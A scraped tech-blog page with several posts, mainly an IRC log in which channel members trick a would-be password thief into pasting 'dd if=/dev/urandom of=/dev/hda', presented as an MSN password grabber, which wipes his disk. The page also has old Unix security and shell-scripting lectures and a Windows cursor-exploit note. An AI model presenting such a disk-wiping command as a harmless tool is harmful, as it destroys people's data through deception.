Technik News

Das Blog zu IT, Mobilfunk & Internet

Linux

A practical guide to get yourself owned on IRC

von

For those of you who are not old enough (or simply don’t know), IRC stands for Internet Relay Chat, and is one of the first real-time, multi-user chat systems that was invented, with capabilities to span multiple servers across countries and continents, servicing thousands of users organized in channels. Daniel Stenberg has a brief overview of IRC history if you want to know a bit more.

Many communities have their dedicated IRC channels where they converse about their topics of interest, and in some cases even offer support for software or services. This is the case of #remote-exploit, registered on Freenode, which serves as a communication and support channel between developers and users of BackTrack, the best and most comprehensive Linux-based Live CD focused on security – this includes auditing, penetration testing, and so on. The IRC channel is frequented by the developers and a few hard-core users, who provide ad-hoc support to other users having difficulties with particular tools, or who may be trying to get something working but failing to do so. Regular chat around security-related topics makes the channel a very nice place to be if you are interested or work in IT security.

There seems to be a trend nowadays, maybe related to how our children are being educated at home and at school, that people simply demand to be spoon-fed particular information to accomplish a very specific task, disregarding the whole process of actually researching, learning and understanding what they are doing. This is particularly important in the security field, as lack of understanding can have very bad consequences, which brings us to today’s episode.

BIG FAT BOLD DISCLAIMERS

  • Kids, do not try this at home. Do not try to play either of the sides you see here, chances are you will lose. Particularly, do not run any of the commands you see being used!
  • Before you start posting comments about how cruel this was, I agree that things may have gone over the top, but if anyone deserved a lesson, it was this guy. Since there is no such thing as an Internet Supreme Court, we have no place to take these people so they can have their right to use the Internet suspended for two years. This guy was asking for information on how to commit several crimes, and this is something no true hacker will ever condone. He was warned many times that what he was asking was illegal and frowned upon, and he still insisted. All he lost was music and games (by his own admission, the contents of his hard drive) – it was very obvious he wasn’t using his computer for any beneficial purpose at the time, so he would just have to reinstall his games and rip his CDs again, no big deal.
  • Hacker does not equate to criminal. A hacker is after knowledge and experimentation, not causing intentional damage. Hackers are analytical and proud of their knowledge, acquired through years of learning and research. Thus, when someone asks for this knowledge to be siphoned off their brains, they get rather miffed, responding as you can see here. If you ask a hacker a sensible question, you will get a sensible answer, as we understand that the same we were taught by others, we have a responsibility to pass on the knowledge – not by spoon-feeding though! An excellent quote found in a DefCon FAQ: ‘Ignorance is forgivable, because it’s curable; stupidity is not… The difference between ignorance and stupidity is in the desire to remain ignorant’.
  • This is not a usual event. I have only seen something like this happen twice, and I’ve been on IRC since around 1993. Don’t think that our purpose in life is to sit in IRC channels waiting for victims to prey on.

This particular event took place the evening of April 31st, when someone using the nick JAGGEN (hint: don’t use caps in IRC for either your nick or typing, as it is considered shouting and rude) joined the #remote-exploit IRC channel, and began asking for information on how to perform various illegal acts:

[01:39] * Joins: JEGGAN (n=lechan@81-226-226-68-no58.tbcn.telia.com)
[01:40] <JEGGAN> Hi i am very new att Back Track 2 and wonder if someone want to answere my questions in private... sorry my eng i am swe
[01:47] <JEGGAN> so sad that nobody is here but i will be back tomorrow then
[01:48] <Zi0n> tomorrow we closed
[01:49] <JEGGAN> can u help me Zi0n ?
[01:49] <Zi0n> deppends on the question
[01:50] <JEGGAN> littel random about back track what i can do and not do and so on but i want to take it in privv but i goes good here if u want becus i don't want to spam down the channel whit stupied questions
[01:50] <Zi0n> if you know your question is stupid, why ask it ?
[01:51] <JEGGAN> becus i don't know if it's possibel
[01:51] <JEGGAN> for exampel can i hack irc and take auth's in quakenet whit it?
[01:51] <Zi0n> anyway, ask you question here and see if anyone can help you with it
[01:51] <JEGGAN> ok
[01:51] <JEGGAN> can i hack auth on quakenet whit back track?
[01:52] <JEGGAN> can i hack emails so i can for exampel get my friends msn account and other's account?

Things went downhill from here – Zi0n told the guy to try in #ubuntu, a channel dedicated to a much better hacker tool collection – of course we all know what Ubuntu really is, and when he joined there he was promptly directed to #ubuntu-offtopic, where he asked the same questions, and was then directed to join #binrev, a hard-core hacker channel on a different IRC server:

[01:59] <FringeJacket> JEGGAN you've got a better chance there
[01:59] <JEGGAN> okok
[01:59] <JEGGAN> let's try then
[02:00] <JEGGAN> uhm in binrev it's nobody there...
[02:00] <kitche> JEGGAN: different server irc.binrev.net is their irc server

Not realizing he was going to make a huge mistake, and having been warned that what he was asking was illegal in at least three different IRC channels, he went on to join #binrev, where the following ensued:

[02:03] * Now talking in #binrev
[02:04] <tehbizz> ok, ask the damn question alrady
[02:10] <JEGGAN> who can i get my friends msn password easy ?
[02:10] <sev> First, learn english.
[02:10] <voltagex> JEGGAN: you can
[02:10] <JEGGAN> how i mean
[02:10] <Strom> JEGGAN: we don't condone that behavior here.
[02:10] <voltagex> ask him for it
[02:11] <sev> That's not the only thing wrong with your question.
[02:11] <JEGGAN> i am new on this and i am swe so i don't have good eng i just want to talk to somebody that can help me a littel bit
[02:11] <voltagex> no.
[02:11] <voltagex> just no.
[02:12] <sev> excellent.
[02:12] <JEGGAN> ?
[02:12] <JEGGAN> so you don't want to help me
[02:12] <Adam> jeggan i know nothing of msn sorry
[02:12] <voltagex> we don't do stealing passwords here
[02:12] <JEGGAN> Adam what do you know about email ?
[02:13] <JEGGAN> voltagex what are you doing here then?
[02:13] <tehbizz> easiest way to get a password: ask for it
[02:13] <tehbizz> discussion over.
[02:13] <sev> JEGGAN: do you know about the amazing hacking powers of 'dd'?
[02:13] <JEGGAN> sev no
[02:13] <voltagex> JEGGAN: not stealing passwords
[02:14] <sev> JEGGAN: I can help you hack with dd.
[02:14] <JEGGAN> sev what is dd?
[02:14] <tehbizz> yes
[02:14] <voltagex> JEGGAN: mad hack tool
[02:14] <sev> it's a remote password grabber
[02:14] <JEGGAN> okok
[02:14] <JEGGAN> where do i get it?
[02:14] <sev> JEGGAN: do you have root access on your machine?
[02:14] <JEGGAN> yes

Now our hapless “hacker” was getting interested…someone is going to teach me how to actually hack, using something called ‘dd’. If you read up Wikipedia’s entry of ‘dd’, you will see that it’s a low-level Unix tool that allows copying data between different media, for example, a floppy disk to a hard drive. It can use a variety of inputs, and write to a variety of outputs. Towards the bottom of the Wikipedia entry, there are some examples of the destructive power of dd, preceeded by this:

warning_dd

As an example, using dd if=/dev/urandom of=/dev/hda will overwrite the hard disk with random data. If this noob had bothered to simply type ‘dd’ in Google, he would have seen the Wikipedia entry as the second result, and taking two minutes to read through it, would have realized that it is not a remote password grabber. Determined to break into other people’s MSN, email and gaming accounts, he charged ahead:

[02:38] <sev> paste this: dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof
[02:38] <JEGGAN> where should i put it?
[02:39] <voltagex> in the command line
[02:39] <sev> in your command line, it's all one line, so paste it carefully
[02:39] <JEGGAN> wtf cant puch ctr+c to copy :s
[02:39] <tehbizz> shift+insert
[02:39] <JEGGAN> now it worked

And the inevitable happened, after a few hours of waiting for something to happen while dd was running:

[18:07] <Citrus> try to reboot anyway
[18:07] <JEGGAN> ok
[18:08] <Citrus> you don't loose anything to see if LILO is there already
[18:08] <JEGGAN> should i boot in windows or BT?
[18:08] <Citrus> no, just boot normal without the CD
[18:08] <JEGGAN> ok
[18:08] <Citrus> you should see a menu
[18:08] <JEGGAN> brb
[18:08] * Quits: JEGGAN (~root@81-226-226-68-no58.tbcn.telia.com) (Quit: Leaving)
[18:14] * Joins: JEGGAN (~JEGGAN@81-226-226-68-no58.tbcn.telia.com)
[18:15] <JEGGAN> Citrus,
[18:15] <JEGGAN> no menu and windows dosen't boot
[18:15] <Citrus> what do you mean doesn't boot?
[18:15] <JEGGAN> that i can't go into windows..
[18:16] <Citrus> JEGGAN: what message do you get?
[18:16] <JEGGAN> insert system disk

You can read the whole exchange here, edited to remove irrelevant background chatter. Lessons to be learned from this:

  • Don’t be an idiot – if you are told to go search and read, it is very likely that there are numerous sources for answers to your question. If you are told what you want to do is illegal, drop it.
  • Don’t believe everything you are told on online (this applies to other means than IRC too!) – would you take advice from a total stranger on the street on how to do brain surgery on yourself? There is no shame in taking your time to double-check advice you are given.
  • Learn the basics and work your way up, not the other way around – if you ask to be taught a very high-level and complex topic, without having made the effort to even learn the basics, you will be frowned upon.

How to get your Windows PC owned by an animated cursor

von

Some of you have already heard of the very nasty vulnerability recently discovered in Windows, which allows code injection when the hapless victim simply views an animated cursor on a HTML page or an email message. Microsoft has announced that due to the seriousness of this issue, it will publish an out-of-sync patch as soon as it is ready, i.e. they will not wait for Patch Tuesdayâ„¢. [Update: as I was writing this, I noticed this post which states that patch MS07-017 has been released].

What do you do when you have in your hands the best security distribution in the world? Use it! Here is the result of Mati Aharoni’s (aka Muts) impersonation of The Mexican – click the image to view the full video.

 

ani_pwn

Kids, do not try this at home, and if you are using Windows, well…my sincere condolences. While you are at it, check out the home site for BackTrack.

Unix Course: Unix Security – Lecture 4

von

The Insides of Athena Unix

Today we are going to talk about Unix security.  The first topic will be the first security system you run across when using Unix.

[] Password Security

Next we will talk about some of the implications of the networking programs which are available.

[] Networking

We will then talk about what it means to protect a file

[] File Security

After that, we will discuss ways for keeping information even more private should you decide to do so.

[] Encryption

I have no intention on teaching you how to break into a system. Instead, I hope to point out some of the things you should do to make sure that you are not the victim of someone elses attempts to breach security.

———————————————————————-
[] General Overview

UNIX is not a „secure“ operating system.  It really wasn’t designed to be one, though.  But, what do we mean by security?  Let’s start by considering several types of security.  There is physical security. This is made up of things like locks on doors, and the Campus Police. For some systems this is sufficient.  For instance, if a computer, and all the terminals which can connect to it are in a locked room, then the system is as secure as the lock on the door is. 

What happens, though, when you add a dialup?  Or a network?  No machine which can be accessed from the outside should be considered secure.   The first line of defense is passwords though.  The idea is to keep people who aren’t supposed to be using the machine from being able to do so.  If they can’t do anything at all, then their not going to be breaking security.  Of course, not all password systems are so great.  It is often possible to obtain passwords by guessing them, or
through various other means.

The last type of security is of particular importance to Athena.  What do you do in an anvironment where lots of people have accounts, but not all these people can be trusted.  You need some way of controlling access to resourses such that people have access to their own files (or other files in certain ciscumstances), and only limited (if any) access to other peoples files.  It is at this level that keeping a system secure becomes a problem because the potential intruder has so many more attacks he can try.

[] Password Security

Let me start by talking about password security.  Under UNIX, passwords are stored in the /etc/passwd file.  This is a publicly readable file, so clearly, something has to be done to protect the passwords.  Passwords are encrypted in such a way that they can not be converted back into the plaintext they were generated from.  When you log in, the system asks you for your password, it then encrypts the password, and compares the encrypted version to what is stored in the /etc/passwd file. 

There are several attacks to breaking this security method.  One approach is brute force.  An attacker tries all possible passwords until he finds the correct one.  This attack is impractical because of the time required. 

Fortunately (for the attacker), most people choose common passwords. There username, their name, or words that are in the dictionary.  In one experiment (described in „Password Security: A Case History“ by Robert Morris and Ken Thompson), 3,289 passwords were collected over a along period of time.  Of these,

15 were single ASCII characters
72 were strings of two ASCII characters
464 were strings of three ASCII characters
477 were four alphanumeric characters
706 were five letters either all upper, or all lower case
605 were six all lower case letters

492 appeared in various available dictionaries

A few things have been done to make things more difficult for the attacker.  An encryption algorithm is used that takes a lot of time to run.  This tends to increase the time required to guess passwords. Passwords are also „salted“.

One attack that has been used is to come up with a dictionary of encrypted passwords, and compare the encrypted password in the password file with the encrypted dictionary.  This takes a lot less time per entry than having to encrypt the plaintext word you want to test, and then comparing it to the encrypted password.  Salting a password means that a random number is selected when the password is initially created, and added to the plaintex before it is encrypted.
This random number is then also added to the encrypted password before it is written to the password file.  When a password is checked, the same random number is taken from the encrypted password, appended to the plaintext which is then encrypted, and the result compared with the encrypted password.

Salting the password means that there are now 4096 versions of each password that are possible.  Thus, an attackers dictionary would have to be 4096 times as large.

[] Networking

The availability of remote login and remote execution in a networking environment (as exists with Athena) introduces many new ways to breach system security.  The problem is how to authenticate users across the network without requiring them to enter their password again.  The way this has been accomplished is through the concept of a „safe host“.  A job can log in, or remotely execute commands without a password only if the user is logged in from a „safe account“ on a „safe host“.

Networking has presented many other problems for system security, but I do not intend to discuss them at this time.

———-
[] File Security

What does it mean to protect a file?

Under UNIX, there are several fields in the protection of a file.  The first three bits control access to the file by its owner.  The next three define the access by other people in ones group (people in the group that owns the file).  On Athena, most peoples groups are „mit“, so this group field is really just another field for „world“.  The last set of three bits define the access for everyone else.

The bits on a file control read, write, and execute, but one also needs to be concerned with the protection bits on directories.  If someone has write access to a directory, then they can create, and delete files contained in it.   Read access to a directory gives one permission to look at the directory (with ls for example). Execute access conveys permission to connect to the directory and to search it for a file which you know the name of.

It is also important to note that someone with access to the root account can read, or write ANY file on the system regardless of the protection.  Pleople who have this access include Athena staff, some consultants,  some system wizards, and occasionally someone who has managed to break the systems security.  On Charon, certain SIPB member have root access.

When you log in, your .login sets a „umask“ which defines the default protection you want to give files you create.  This mask is 3 octal digits defining the bits that you DO NOT want to appear in the protection for the various entities (owner, group, and world). Further, if you have given niether read, nor execute access to a directory, then other users will not be able to access files beneath that directory regardless of the protection of the individual file.

[] Encryption

As you can see, there is no way to keep a file totally secure under UNIX.  Since the file can’t be secure, you may want to use encryption to keep the contents secure.  Currently there is a program called crypt which can be used to encrypt files.  Unfortunately, the algorithm used in crypt has been broken.  In the near future, Athena will be distributing a new algorithm (I believe based on DES) to replace crypt.  This algorithm is believed to be more secure.

My Boeing 767 runs Linux, and yours?

von

This was seen on a Boeing 767 while en route from Las Vegas to Atlanta, the flight being operated by Delta. Apparently, many people were having problems with their purchased movies, and so the crew decided to reset the system, provoking a nicely familiar sight.

215975831_a92b862a26
Linux on a plane

Now we could all start making jokes about nmapping the plane, or trying to run Asterisk off a USB drive plugged into the management console, which by the way was accessible to anyone who wandered to the toilet and happened to look left. It had a nice big “Reset all” button too, two USB ports, and a gigabit etherenet RJ45. I just hope they don’t run a kernel with some remote_crash_plane() buffer overflow exploit…

Unix Course: More Shell Programming – Lecture 3

von

The Insides of Athena Unix

Today we will discuss Shell Scripts.  I will start by discussing how and why they are used. 

You will find that most shell scripts are written for the bourne shell.  The reason for this is that all unix systems have the bourn shell, wehreas not all of them have the c shell.  It is possible to write a shell script that runs under the c shell, though, by putting

#!/bin/csh

On the first line of the script.  I will only discuss bourne shell programming here, and you should refer to the man page for the c shell for information on how to write shell scripts which use it.

Simple shell programs are often only one line long.  If there is a command line that you type frequently (often that involves piping the output of one command into another) you can enter that line into a file, and use it as a shell script which can be invoked by its name. For example, suppose you wanted a command that listed all the places you are logged in on a given cluster.

One way to do this would be to issue the command:

rwho | grep {your username}

Now suppose that instead you wanted to do this whenever you typed the command „findme“.  You would then create a file „findme“ containing the line above.  Before you can execute the shell script, you have to tell UNIX that the file findme is in fact a program and not just a text file.  You can do this by changing is mode to allow execute access:

chmod a+x findme

At this point, typeing „findme“ would perform those commands.  This could have been done using the alias feature instead, so what is so special about shell scripts?  Well, to start with, next time you log in, this command will still be there.  Further,  other people can use the new command you just defined (if they can access the file).
Shell scripts also can be much more complex (several pages for example.

—–
[] arguments

The next useful ability with shell scripts is arguments.  Suppose that you wanted to do the same as we did above, but you want to specify the user on the command line.  Lets call that command „findu“.  If I want to see where bcn is logged in I should be able to say „findu bcn“. Well, this is simple.  Instead of your username, you use the value „$1“.  $1 in a shell script expands to the value  of the first argument.  Similarly, $2 is the second argument, $3 the third and $0 is the name of the command itself.

So findu would look as follow:

rwho | grep $1

Note that arguments are used in the same manner that variables are used.


[] for, while do, if then else, and case

Like any other programming language, shell scripts allow various looping and selection constructs.  One of these is the „for“ statement.

It’s format is:

for variable in list_of_values
do
  statemtns
done

the list of variables can use *s to select file names.  If you leave out the in list_of values, the for statement will iterate through the arguments given to the shell.    


The form of the while do statement is:

while condition
do
  statements
done

This is like the while do statement in most programming languages, so I won’t go into details about it.


Then there is the if then else statement.
Its form is:

if condition
then
statements
[elif condition then]
statements
[else]
fi

The elif (else if) and the else statements are optional.  The if statements does just what you would expect.  If the condition is true, then it executes the then part.  If it is false, and if the is an elif, then it check that condition, and executes the then clase of it. If none of the conditions are ture, it executes the else clause.

 The last construct I will talk about is the case statement.  Its form is:

case $variable in

 v1) statement
  break;;
 v2)
  statement
  break;;
 *)

esac
There is also an until statement which is similar to the while statement.

———
[] test

So far, I have mentioned condition, but I haven’t mentioned how to specify conditions.  Conditions are really only the exit status of a program.  Hence, the way you specify a condition is to run a program which will return an error if a condition is face, and will return successfully if it is true.  This program is the test program.  I will very briefly describe the test command.  For more information you can say „man test“ when logged in.

Arguments for test are of the form N <primitive> M where N and M are variables or constants, and the promitive is

-eq, -ne, -gt, -lt, -ge, -le    for numbers
= and != for strings.

Alternatively you can say test -f filname to test for existance of a file, -s to check that the file isn’t empty.  -d checks if a file is a directory, -w if it is writable, and -r checks if it is readable. These aren’t all the options to test though. 

In many shell scripts, you may see square brackets around what looks like a test statement.  If square brackets are used, you don’t have to say test.  In other words,

[-f file] 

is equivilant to

test -f file

 
[] use of /tmp

When writing shell scripts, one will often need to use temporary files.  When doing so, a good place to sture these temporary file is in /tmp.  It is important that the temporary file you create has a different name than any file already in tmp.  To do this, you can use the shell variable $$ which translates into the current process number.  In fact, a good name to use is $0$$ which is the name of the current shell script followed by the process ID.  Ussing this name will prevent conflicts with other programs, or different invocations of the same program.

Another thing which is important is to have your shell script remove the file when it is done using it.  This way, /tmp does not fill up.
Files in /tmp in theory are deleted periodically, but the policy is different on different systems.  It never hurts to delete a temporary file that you no longer need.
———
[] interrupts

The trap command is useful for dealing with interrupts such as ^C or hanging up the phone line.   The form for the trap command is:

trap ‚command arguments‘ signal1 signal2

for example

trap ‚rm $tmp* ;exit‘ 2 1
———
[] exit

This brings us to the last command I want to describe.  The exit command.  The exit command alows one to exit a shell script.  Exit takes an argument, and returns that value.  A zero value usually indicated that the command has run successfuly, whereas a value of 1 usually indicates that an error has occured.

OpenOffice – no go on Mac OS X

von

Today I received an email with some technical specs I was supposed to review, but the document came in OpenOffice Write format (.odt), and since on my MacBook I only had Office installed, there was no way to open it.

Checking the OpenOffice.org site, it appeared a version was available for OS X, but in the traditional open source way, I was met with thinks like:

“en-US builds for Intel based Macs will be listed here as soon as they passed QA. In the meantime please” (The phrase really ends like this, I am quoting vervatim!)

…please…what? What am I supposed to do in the meantime? Ask the guy who sent me the document to re-send it in Word format? Oh, wait, here is the solution:

“The builds use X11 and are meant for the user who doesn’t care that much about look but functionality and cross plattform integration and usability. Other prospects are the Darwin community and the Unix-savvy MacOS X user community and forming a platform for us to build the Quartz and Aqua tracks for the traditional Mac user.”

I thought Intel Macs had only been around for a few months, so how can there be a tradition? Last, but not least, the list of mirrors for the english version were empty. No problem for German or French users, so congrats to you, lucky people! The fact it was empty explained the “in the meantime” statement.

What is this rant all about? The discussion I had the other day with a diehard opensource defender – the type that scream “Linux will conquer the desktop next year, really, this time” any chance they get. I think it is really great that people are willing to donate their time to contribute to opensource projects, some as large as Linux or OpenOffice, but they have to think in terms of reality, not utopia. To think Linux will take over Windows on the desktop, or that OpenOffice will replace Office, at least in the short or medium term, is wishful thinking.

I expect to be beaten to death by the diehard Linux fans, but there is no way my mother would know how to “vi your X86 configuration file to change the video adapter so that it works”. Until Linux or OpenOffice offer similar experiences than Windows or Office, there will stay in niche or very specific target groups. Companies are migrating to these operating systems and office suites, yes, but they usually have the resources to implement the transition, both from technical and training standpoints.

So, good luck with the project, I honestly wish it every success, and I am sorry that I am not a competent UNIX programmer so I can contribute. But from a user’s perspective, it has some way to go.